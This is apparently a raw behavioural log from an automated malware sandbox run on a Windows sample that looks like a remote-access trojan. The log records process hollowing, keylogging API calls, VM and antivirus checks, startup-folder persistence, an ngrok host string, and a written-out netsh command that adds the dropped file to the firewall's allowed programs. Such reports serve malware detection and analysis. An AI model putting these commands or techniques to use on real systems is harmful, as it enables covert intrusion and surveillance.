Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 14DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 15DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 16DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 17DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 18DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 19DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1ADD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1BDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1CDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1DDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1EDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1FDD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 20DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 21DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 22DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 23DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 24DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 25DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 26DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 27DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2C250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2D250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2E250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2F250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 30250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 31250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 32250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 33250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 34250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 11B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 165C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 175C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 165C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 25ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 26ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 27ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 35250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 36250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 37250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 38250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 39250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 3A250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 3B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 3C250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 3D250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 3E250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 3F250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 40250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 34250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 165C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 11C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 4C70000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: ED0000 memory commit \| memory reserve \| memory write watch

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Window / User API: threadDelayed 1136			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Window / User API: threadDelayed 1469			Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Jump to dropped file
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe TID: 5172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe TID: 6544	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6248	Thread sleep time: -568000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6248	Thread sleep time: -734500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 2784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 1020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 1196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 4180	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: WindowsServices.exe, 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxServiceTrueTEMP'WindowsServices.exe#0.tcp.in.ngrok.io
Source: wscript.exe, 00000008.00000002.1724300539.000001B2E79D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WindowsServices.exe, 00000015.00000002.2000565447.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService
Source: netsh.exe, 0000000E.00000003.1819379283.00000000009F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	API call chain: ExitProcess graph end node	graph_0-1829
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	API call chain: ExitProcess graph end node	graph_0-1912
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	API call chain: ExitProcess graph end node	graph_0-1911

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

0_2_00405A10

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Code function: 0_2_00405A10 mov eax, dword ptr fs:[00000030h]

0_2_00405A10

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, kl.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

0_2_00405A10

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Memory written: C:\Users\user\Desktop\nOZ2Oqnzbz.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: 6AEC8B55
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: 6AEC8B55
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: 400000

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

Jump to behavior

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
